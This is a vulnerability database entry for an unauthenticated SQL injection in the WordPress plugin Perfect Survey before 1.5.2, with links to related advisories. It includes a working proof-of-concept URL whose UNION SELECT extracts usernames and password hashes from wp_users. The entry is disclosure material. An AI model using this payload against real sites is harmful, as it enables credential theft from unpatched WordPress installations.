Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpexploitApple502jWPEX-ID:C1620905-7C31-4E62-80F5-1D9635BE11AD
HistoryOct 05, 2021 - 12:00 a.m.

Perfect Survey < 1.5.2 - Unauthenticated SQL Injection

2021-10-0500:00:00
apple502j
1479
JSON

The plugin does not validate and escape the question_id GET parameter before using it in a SQL statement in the get_question AJAX action, allowing unauthenticated users to perform SQL injection.

(The question_id must start with an existing post ID) https://example.com/wp-admin/admin-ajax.php?action=get_question&question_id=1%20union%20select%201%2C1%2Cchar(116%2C101%2C120%2C116)%2Cuser_login%2Cuser_pass%2C0%2C0%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%20from%20wp_users

Related

wpvulndb 1
cnvd 1
attackerkb 1
prion 1
zdt 1
nuclei 1
patchstack 1
packetstorm 1
cve 1
exploitdb 1
wpvulndb
wpvulndb
Perfect Survey < 1.5.2 - Unauthenticated SQL Injection
2021-10-05 00:00:00
cnvd
cnvd
WordPress Perfect Surveyๆ’ไปถSQLๆณจๅ…ฅๆผๆดž
2022-02-10 00:00:00
attackerkb
attackerkb
CVE-2021-24762
2022-02-01 00:00:00
prion
prion
Sql injection
2022-02-01 13:15:00
zdt
zdt
WordPress Perfect Survey Plugin - 1.5.1 - SQL injection (Unauthenticated) Exploit
2022-02-21 00:00:00
nuclei
nuclei
WordPress Perfect Survey <1.5.2 - SQL Injection
2022-02-25 06:27:21
patchstack
patchstack
WordPress Perfect Survey plugin <= 1.5.0 - Unauthenticated SQL Injection (SQLi) vulnerability
2021-10-05 00:00:00
packetstorm
packetstorm
WordPress Perfect Survey 1.5.1 SQL Injection
2022-02-21 00:00:00
cve
cve
CVE-2021-24762
2022-02-01 13:15:00
exploitdb
exploitdb
WordPress Plugin Perfect Survey - 1.5.1 - SQLi (Unauthenticated)
2022-02-21 00:00:00
JSON
Related for WPEX-ID:C1620905-7C31-4E62-80F5-1D9635BE11AD
wpvulndb1cnvd1attackerkb1prion1zdt1nuclei1patchstack1packetstorm1cve1exploitdb1